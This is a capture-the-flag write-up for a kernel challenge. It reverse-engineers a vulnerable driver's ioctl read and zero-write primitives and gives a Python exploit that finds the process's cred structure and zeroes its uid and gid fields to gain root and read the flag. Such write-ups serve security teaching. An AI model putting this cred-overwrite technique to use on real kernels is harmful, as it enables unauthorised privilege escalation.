Teen Kernel

The challenge description was:

“The baby was cute and made sure to let you know if something is wrong. Now, the baby has grown into a teen, a stubborn one. He does not like to talk very much. Can you display some authority?”

This challenge is the continuation of the Baby kernel challenge; our solution involves knowledge from Baby kernel.

Playing around

Running run.sh displays the following menu:

----- Menu -----

  1. Read
  2. Write
  3. Show me my uid
  4. Read flag
  5. Any hintz?
  6. Bye!

Let’s have a look at what the menu has to offer 🙂

Asking for a hint with option 5 gives no clue. Option 4 obviously does not work either: Could not open file for reading...

Option 3 returns our uid:

uid=1000(user) gid=1000(user) groups=1000(user)

As for options 1 (Read) and 2 (Write), this is where things get serious. We will come back to them later.

Examining the files

We extract the initramfs with zcat initramfs.cpio.gz | cpio -idmv.

> ls:

bin client_kernel_kid etc flag home init lib proc root sys usr var

Note the flag file, which almost certainly belongs to root.

Let’s open the init file:

#!/bin/busybox sh
# /bin/sysinfo

...

...

insmod "/lib/modules/$(uname -r)/kernel_kid.ko"
chmod +rw /dev/flux_kid
chmod +x /client_kernel_kid

sleep 2

su user -c /client_kernel_kid

...

Listing the /lib/modules directory reveals the kernel version: 5.3.5.

We see a custom kernel driver, kernel_kid.ko, exposed through the device node /dev/flux_kid.

We also see that init ends up running client_kernel_kid as the user user, which matches what we saw when printing our uid:

uid=1000(user) gid=1000(user) groups=1000(user)

Decompiling the client_kernel_kid binary with Ghidra and navigating to the menu function gives the following:

  1 
  2 int menu_function(void)
  3 
  4 {
  5   int user_choice;
  6   ulong flux_fd;
  7 
  8   FUN_00401d8b();
  9   flux_fd._0_4_ = open_flux_driver(PTR_s__dev_flux_kid_004ca100,0);
 10   if ((int)flux_fd == -1) {
 11     output_string("Mh?\n");
 12   }
 13   print_menu();
 14   user_choice = get_user_selection();
 15   switch(user_choice) {
 16   default:
 17     output_string("You are not making any sense...");
 18     close_flux_fd((int)flux_fd);
 19     return 0;
 20   case 1:
 21     handle_read((int)flux_fd);
 22     break;
 23   case 2:
 24     handle_write((int)flux_fd);
 25     break;
 26   case 3:
 27     handle_getuid("id");
 28     break;
 29   case 4:
 30                     /* 4. Read The Flag */
 31     The_Flag_Func();
 32     break;
 33   case 5:
 34     FUN_004020b1();
 35     break;
 36   case 6:
 37     close_flux_fd((int)flux_fd);
 38     output_string("Bye!");
 39     return 0;
 40   }
 41 }

Unsurprisingly, the implementation opens the /dev/flux_kid driver at line 9 and uses it for reading and writing.

Let’s examine the function handle_read, which implements the Read option of the menu:

void handle_read(int flux_fd)

{
  long lVar1;
  ulong offset;
  long in_FS_OFFSET;
  ulong value;

  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  value = 0xdeadbeefdeadbeef;
  output_string("Sigh...\n> ");
  offset = get_user_selection();
  output_string("I hope this will not suck too much...");
  flux_driver_read(flux_fd,offset,&value);
  FUN_00409920("Alright, alright: %016lx\n",value);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    check_stack_integrity();
  }
  return;
}

We see that the user is prompted to enter a value, stored in the variable offset; offset is then passed to the function flux_driver_read along with the address of an output parameter, &value. The value is then printed to the screen. Let’s look at the flux_driver_read function:

/* Added while reversing */
typedef struct read_arg_t {
    unsigned long offset;
    unsigned long *p_user_output_val;
} read_arg_t;

void flux_driver_read(int flux_fd, ulong offset, ulong *p_out_value)

{
  long lVar1;
  long in_FS_OFFSET;
  read_arg_t arg;

  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  arg.offset = offset;
  arg.p_user_output_val = p_out_value;
  invoke_flux_ioctl(flux_fd,0x385,&arg);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    check_stack_integrity();
  }
  return;
}

This function bundles the offset and the address of the output value into a read_arg_t structure and passes it to invoke_flux_ioctl along with the driver file descriptor and a request number, 0x385.

Looking at the assembly of invoke_flux_ioctl:

   int __stdcall invoke_flux_ioctl(int fd, ulong req, ...)

        004501f0 f3 0f 1e fa     ENDBR64
        004501f4 b8 10 00        MOV        EAX,0x10
                 00 00
        004501f9 0f 05           SYSCALL
        004501fb 48 3d 01        CMP        RAX,0xfffff001
                 f0 ff ff
        00450201 73 01           JNC        LAB_00450204
        00450203 c3              RET

We see that 0x10 is stored in eax before the syscall instruction is executed. 0x10 is __NR_ioctl, so the ioctl operation of the driver is invoked here with request number 0x385 and the address of the argument structure.
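As a rough illustration of what the client hands to the driver, the 16-byte argument for request 0x385 can be modeled in Python. The helper name pack_read_arg and the sample user-space address are made up for this sketch, and the little-endian layout of two 64-bit fields is an assumption based on the x86-64 target:

```python
import struct

FLUX_READ = 0x385  # request number seen in flux_driver_read

def pack_read_arg(offset, out_ptr):
    """Model read_arg_t as two 64-bit little-endian fields (x86-64 assumed)."""
    return struct.pack("<QQ", offset & 0xFFFFFFFFFFFFFFFF, out_ptr)

# Hypothetical user-space address of the output slot (&value in handle_read).
blob = pack_read_arg(40, 0x7FFD12345678)
print(hex(FLUX_READ), len(blob), blob.hex())
```

The first 8 bytes carry the offset and the last 8 bytes carry the pointer the driver will write the result to.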

Now moving to the Write option of the menu, implemented by the handle_write function:

void handle_write(int flux_fd)

{
  ulong offset;
  longlong val;

  output_string("Oh really...?\n> ");
  offset = get_user_selection();
  if (offset < 0x10000) {
    output_string("Sorry, I am not in for that kind of an adventure...");
  }
  else {
    output_string("What is that all about?\n> ");
    val = get_user_selection();
    output_string("Please no...");
    flux_driver_write(flux_fd,offset,val);
    output_string("I cannot believe this.");
  }
  return;
}

As in handle_read, the user input is stored in offset. This time, offset has to be greater than or equal to 0x10000 to proceed any further. Once this check passes, the user is prompted for a second value, stored in val. Finally, offset and val are passed to the function flux_driver_write, which invokes the driver with request 0x386 via invoke_flux_ioctl, as in the Read option.

void flux_driver_write(int fd,ulong offset,ulong val)

{
  long lVar1;
  long in_FS_OFFSET;
  ulong __offset;

  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  __offset = offset;
  invoke_flux_ioctl(fd,0x386,&__offset);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    check_stack_integrity();
  }
  return;
}

We see that nothing is done with val: only the address of the offset is passed to the ioctl, so the value entered by the user does not matter.

The driver

At this stage, Ghidra did not do very well at decompiling the driver, so we switched to IDA.

Looking into the driver we have the following ioctl implementation:

__int64 __fastcall driver_ioctl(__int64 a1, int req, __int64 value)
{
  __int64 result; // rax@4

  if ( req == 0x385 )
  {
    read(value);
    result = 0LL;
  }
  else
  {
    if ( req == 0x386 )
      write(value);
    result = 0LL;
  }
  return result;
}

We recognize the request value 0x385 for read and 0x386 for write.

The read function looks like this:

  1 __int64 __fastcall read(read_arg_t *p_arg)
  2 {
  3   __int64 result; // rax@1
  4   unsigned __int64 v2; // rt1@1
  5   __int64 output_value; // [rsp+0h] [rbp-28h]@1
  6   read_arg_t arg; // [rsp+8h] [rbp-20h]@1
  7   unsigned __int64 v5; // [rsp+18h] [rbp-10h]@1
  8 
  9   v5 = __readgsqword(0x28u);
 10   arg.offset = 0LL;
 11   arg.p_user_output_val = 0LL;
 12   output_value = 0LL;
 13   copy_from_user(&arg, p_arg, sizeof(read_arg_t));
 14   output_value = *(__int64 *)((char *)&arg.offset + arg.offset);
 15   copy_to_user(arg.p_user_output_val, &output_value, 8LL);
 16   v2 = __readgsqword(0x28u);
 17   result = v2 ^ v5;
 18   if ( v2 == v5 )
 19     result = 0LL;
 20   return result;
 21 }

The important lines are lines 13 to 15:

Line 13: the user argument bundle is copied into the local variable arg on the kernel stack.

Line 14: the offset passed by the user is added to the kernel address of arg, i.e. &arg. The 8 bytes at the resulting address are read and copied back to the user at line 15. This is semantically equivalent to:

char *p = (char *)&arg;
output_value = *(__int64 *)(p + arg.offset);

This makes clear that the read function actually gives a read that is relative to the address of arg on the kernel stack.
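To make the relative read concrete, here is a toy model in Python. The kernel stack is represented by a plain bytearray and &arg by an index into it; the function name relative_read and the layout of the toy stack are assumptions made for this sketch, not something taken from the driver:

```python
import struct

def relative_read(stack, arg_index, offset):
    """Return the 8 bytes found `offset` bytes past the modeled &arg."""
    start = arg_index + offset
    if start < 0 or start + 8 > len(stack):
        raise IndexError("read leaves the modeled stack")
    return struct.unpack_from("<Q", stack, start)[0]

# Toy stack of 64 bytes: `arg` sits at index 16 and a marker value
# is planted 40 bytes further.
stack = bytearray(64)
struct.pack_into("<Q", stack, 16 + 40, 0xFFFFFFFFC01D41A3)
print(hex(relative_read(stack, 16, 40)))
```

In the real driver there is no bounds check, which is what turns this into an arbitrary read once &arg is known.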

We can experiment for instance with offset 40:

----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read flag
5. Any hintz?
6. Bye!
> 1
Sigh...
> 
40
I hope this will not suck too much...
Alright, alright: ffffffffc01d41a3

Let’s try with 505:

----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read flag
5. Any hintz?
6. Bye!
> 1  
Sigh...
> 
505
I hope this will not suck too much...

This time the kernel crashed. The faulting access is most likely the 8-byte dereference at line 14: an 8-byte read starting at offset 505 ends at offset 513, which is 1 byte past 512 (0x200). In other words, we apparently hit one end of the kernel stack.
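The boundary arithmetic can be checked with a few lines of Python. This is only a model under the assumption that an 8-byte access is what faults and that the stack ends 0x200 bytes after &arg; offset 504 was not tested in the challenge itself:

```python
READ_SIZE = 8      # the driver dereferences an __int64
STACK_END = 0x200  # assumed distance from &arg to the end of the stack

def crosses_stack_end(offset):
    """True if an 8-byte read at `offset` touches bytes past STACK_END."""
    return offset + READ_SIZE > STACK_END

for off in (40, 504, 505):
    print(off, crosses_stack_end(off))
```

Under this model, 504 is the largest offset that stays inside the stack, and 505 is the first one that spills over by a single byte.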

As for the write function:

__int64 __fastcall write(__int64 user_value)
{
  __int64 result; // rax@1
  unsigned __int64 v2; // rt1@1
  __int64 kernel_value; // [rsp+0h] [rbp-20h]@1
  __int64 zero; // [rsp+8h] [rbp-18h]@1
  unsigned __int64 v5; // [rsp+10h] [rbp-10h]@1

  v5 = __readgsqword(0x28u);
  kernel_value = 0LL;
  zero = 0LL;
  copy_from_user(&kernel_value, user_value, 16LL);
  *(__int64 *)((char *)&kernel_value + kernel_value) = zero;
  v2 = __readgsqword(0x28u);
  result = v2 ^ v5;
  if ( v2 == v5 )
    result = 0LL;
  return result;
}

The logic is pretty much the same as in the read function: the user input is interpreted as an offset that is added to a reference kernel address on the stack, and a zero is written at the resulting address:

*(__int64 *)((char *)&kernel_value + kernel_value) = zero;

So to conclude, we have a read primitive that provides a relative read on the kernel stack based on an offset passed by the user and a write primitive that provides a relative zero write on the kernel stack, using a user offset as well.
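The write primitive can be modeled the same way as a toy in Python. The bytearray standing in for kernel memory and the name relative_zero_write are assumptions of this sketch; the real driver performs no bounds check:

```python
import struct

def relative_zero_write(stack, base_index, offset):
    """Overwrite the 8 bytes at base_index + offset with zeros."""
    start = base_index + offset
    if start < 0 or start + 8 > len(stack):
        raise IndexError("write leaves the modeled stack")
    struct.pack_into("<Q", stack, start, 0)

# Toy memory filled with 0xff; the modeled &kernel_value is index 8.
stack = bytearray(b"\xff" * 32)
relative_zero_write(stack, 8, 8)
print(stack.hex())
```

Only the 8 bytes at the targeted position change, which is all we need to clear uid and gid fields later on.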

Exploitation

The plan is the following:

  1. Using the read primitive, find the address of the task_struct of the current process,
  2. Using the read primitive, find the address of the cred,
  3. Using the write primitive, overwrite all the uids and gids within the cred with 0,
  4. Invoke the “Read flag” option in the menu as root.

Since we read relative to arg, we first need to find its address, &arg. To understand why, let’s look again at the line that actually fetches the value from the stack:

 14   output_value = *(__int64 *)((char *)&arg.offset + arg.offset);

The only input we have is arg.offset . Suppose we want to read the value at kernel address kaddr, we could achieve this by passing the offset kaddr - &arg.offset. Then the above expression resolves to:

14    output_value = *(__int64 *)((char *)&arg.offset + kaddr - &arg.offset);

In other words:

output_value = *(__int64 *)((char *)kaddr)

Which is exactly what we want.
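A minimal sketch of this offset computation in Python follows. The name offset_for is made up for the illustration, and the masking to 64 bits assumes that the client accepts the offset as an unsigned 64-bit value and that the pointer addition in the kernel wraps around, which matters when kaddr lies below &arg. The two addresses are the ones printed by the sample run at the end of this write-up:

```python
MASK64 = (1 << 64) - 1

def offset_for(kaddr, arg_addr):
    """Offset such that &arg + offset == kaddr (modulo 2**64)."""
    return (kaddr - arg_addr) & MASK64

arg_addr = 0xFFFFAED3C00B3E00  # "stack at" value from the sample run
kaddr = 0xFFFF94F68311C800     # "task_struct at" value from the sample run
off = offset_for(kaddr, arg_addr)
print(hex(off))

# Adding the offset back to &arg lands on kaddr after wrap-around.
assert (arg_addr + off) & MASK64 == kaddr
```

A wrapped offset like this one is also far above 0x10000, so it would pass the check in handle_write.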

To determine &arg, we first need to find an address on the stack. We can rely on the kernel stack addresses seen in the Baby kernel challenge to know what a stack address looks like; alternatively, we can search for values that look like the linked list of saved frame pointers (two consecutive values differ by less than a page and the alignment matches). We find such an address at offset 0x120; let’s call it x.

Now we use the fact that offset 0x200 hits one end of the stack to find &arg. First compute the page address of x: page_address = x & ~0xfff. Then, assuming that the crash happened at the page boundary, we have &arg + 0x200 = page_address + 0x1000.

Thus,

&arg = page_address + 0x1000 - 0x200 = page_address + 0xe00

Let’s start coding a python script:

#Python script

x = read_value_at(0x120)
arg_addr = (x & ~0xfff) + 0xe00
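The helper read_value_at is not shown in this write-up. Presumably it selects option 1, sends the offset and parses the reply. The following is only a sketch of the parsing half, with the hypothetical name parse_read_reply; how the script talks to the client (serial console, socket, and so on) is deliberately left out:

```python
import re

# Matches the format string "Alright, alright: %016lx" used by handle_read.
REPLY_RE = re.compile(r"Alright, alright: ([0-9a-f]{16})")

def parse_read_reply(text):
    """Extract the 64-bit value from the client's reply, or None if absent."""
    match = REPLY_RE.search(text)
    return int(match.group(1), 16) if match else None

sample = "I hope this will not suck too much...\nAlright, alright: ffffffffc01d41a3\n"
print(hex(parse_read_reply(sample)))
```

Returning None when the reply line is missing gives the caller a way to notice that the kernel crashed instead of answering.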

Next, we find the task_struct address, based on what we learned in the Baby kernel challenge about what a task_struct address looks like. We find it at offset 0xf0.

task_struct = read_value_at(0xf0)

Now moving to find the cred pointer.

We know that the cred pointer should appear twice in task_struct with the same value (real_cred and cred), and that it does not point inside the task_struct. Note that this kernel uses a randomized structure layout (see __randomize_layout at the end of the definition below), meaning that the fields real_cred and cred are not necessarily adjacent. We thus need to search within a sufficiently large range.

struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key  *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;  /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    /* RCU deletion */
    union {
        int non_rcu;            /* Can we skip RCU deletion? */
        struct rcu_head rcu;        /* RCU deletion hook */
    };
} __randomize_layout;

Using the read primitive, we dump our task_struct, collect all the kernel pointers it contains and keep those that appear exactly twice:

# arg_addr is the origin of the read primitive, so we need to subtract it
current_data = [read_value_at(task_struct + i - arg_addr) for i in range(0, 0xa00, 8)]

ptrs = {}

for i, pt in enumerate(current_data):
    if (pt>>48) == 0xFFFF and current_data.count(pt) == 2:
        ptrs[pt] = i
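The same filter can be tried offline on a made-up dump. In this sketch the function name duplicate_kernel_pointers and the sample values are illustrative only; the logic mirrors the loop above, including the fact that the recorded index is the one of the last occurrence:

```python
def duplicate_kernel_pointers(qwords):
    """Map each kernel-looking value seen exactly twice to its last index."""
    found = {}
    for index, value in enumerate(qwords):
        if (value >> 48) == 0xFFFF and qwords.count(value) == 2:
            found[value] = index
    return found

# Made-up dump: one pointer appears twice, another only once.
dump = [0x0, 0xFFFF924F4210D6C0, 0x3E8,
        0xFFFF924F4210D6C0, 0xFFFF924F4211B620, 0x1]
print({hex(k): v for k, v in duplicate_kernel_pointers(dump).items()})
```

The index is counted in 8-byte words, so the byte offset inside the dump is the index multiplied by 8.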

Now we walk through each cred candidate in steps of 8 bytes, look for anything resembling our uid (1000) and use the write primitive to overwrite it with 0, which makes us root. Finally, we read the flag as root.

read_uid()
for pt in ptrs.keys():
    for i in range(0, 0x100, 8):
        val = read_value_at(pt - arg_addr + i)
        print("%x (%d): %x" %(pt + i, ptrs[pt], val))
        if (val >> 32 == 1000):
            write_value_at(pt - arg_addr + i)

#check we are root            
read_uid()
#getting the flag
read_flag()
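Since kuid_t and kgid_t are 32 bits wide, each 8-byte read covers two adjacent fields, and the test in the script only looks at the upper half. The following sketch, with the hypothetical helper split_ids, decodes a few of the values that appear in the sample output of this write-up:

```python
def split_ids(qword):
    """Split a 64-bit read into its low and high 32-bit halves."""
    return qword & 0xFFFFFFFF, (qword >> 32) & 0xFFFFFFFF

for value in (0x3E8000003E8, 0x3E800000000, 0x3000003E8, 0x3E8):
    low, high = split_ids(value)
    print(hex(value), low, high)
```

Because the write primitive zeroes 8 bytes at once, a single write clears both 32-bit halves of the targeted word.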

Note the call to write_value_at() in the script: we assumed that the stack address the write is relative to (&kernel_value) sits at the same offset in the page as &arg in the read case. This appears to be true.

In the script output, the value 1000 (uid) shows up at various offsets from the pointer stored at index 44 of our task_struct dump (byte offset 44 * 8 = 0x160); those offsets are not consecutive, which is the effect of the randomized layout.

Let’s finally look at the script output:

stack at ffffaed3c00b3e00
task_struct at ffff94f68311c800

uid=1000(user) gid=1000(user) groups=1000(user)
ffff924f4211b620 (5): ffff924f4211b620
ffff924f4211b628 (5): ffff924f4211b620
ffff924f4211b630 (5): 0
ffff924f4211b638 (5): ffff924f40071d80
ffff924f4211b640 (5): ffff924f4210d6c0
ffff924f4211b648 (5): 0
ffff924f4211b650 (5): 1
ffff924f4211b658 (5): ffff924f421184c0
ffff924f4211b660 (5): ffff924f421184c0
ffff924f4211b668 (5): bb192e36
ffff924f4211b670 (5): 0
ffff924f4211b678 (5): ffff924f4211b678
ffff924f4211b680 (5): ffff924f4211b678
ffff924f4211b688 (5): ffff924f4211b688
ffff924f4211b690 (5): 0
ffff924f4211b698 (5): 0
ffff924f4211b6a0 (5): 0
ffff924f4211b6a8 (5): 0
ffff924f4211b6b0 (5): 0
ffff924f4211b6b8 (5): 0
ffff924f4211b6c0 (5): 0
ffff924f4211b6c8 (5): 0
ffff924f4211b6d0 (5): 0
ffff924f4211b6d8 (5): 0
ffff924f4211b6e0 (5): ffff924f4211b6e0
ffff924f4211b6e8 (5): 0
ffff924f4211b6f0 (5): 0
ffff924f4211b6f8 (5): 0
ffff924f4211b700 (5): 0
ffff924f4211b708 (5): ffffffff9745f460
ffff924f4211b710 (5): ffffffff97e44740
ffff924f4211b718 (5): 0
ffff924f4210d6c0 (44): 3fffffffff
ffff924f4210d6c8 (44): ffffffff97e40ae0
ffff924f4210d6d0 (44): 0
ffff924f4210d6d8 (44): 0
ffff924f4210d6e0 (44): 43736564
ffff924f4210d6e8 (44): 3e8  <---- This is 1000
ffff924f4210d6f0 (44): 0
ffff924f4210d6f8 (44): ffff924f42127b80
ffff924f4210d700 (44): ffff924f40091720
ffff924f4210d708 (44): 2
ffff924f4210d710 (44): 0
ffff924f4210d718 (44): 3e800000000
ffff924f4210d720 (44): 0
ffff924f4210d728 (44): 3000003e8
ffff924f4210d730 (44): 3e8000003e8
ffff924f4210d738 (44): 3e8000003e8
ffff924f4210d740 (44): 0
ffff924f4210d748 (44): 3e8  <---- This is 1000
ffff924f4210d750 (44): 0
ffff924f4210d758 (44): 0
ffff924f4210d760 (44): 0
ffff924f4210d768 (44): 0
ffff924f4210d770 (44): 0
ffff924f4210d778 (44): 0
ffff924f4210d780 (44): 7858641e66cbc03c
ffff924f4210d788 (44): 0
ffff924f4210d790 (44): 0
ffff924f4210d798 (44): 0
ffff924f4210d7a0 (44): 0
ffff924f4210d7a8 (44): 0
ffff924f4210d7b0 (44): 0
ffff924f4210d7b8 (44): 0

uid=0(root) gid=0(root) groups=1000(user)

   Here are your 0x23 bytes of the flag: 
   flag{why_are_y0u_not_talking_to_me}

The flag is flag{why_are_y0u_not_talking_to_me}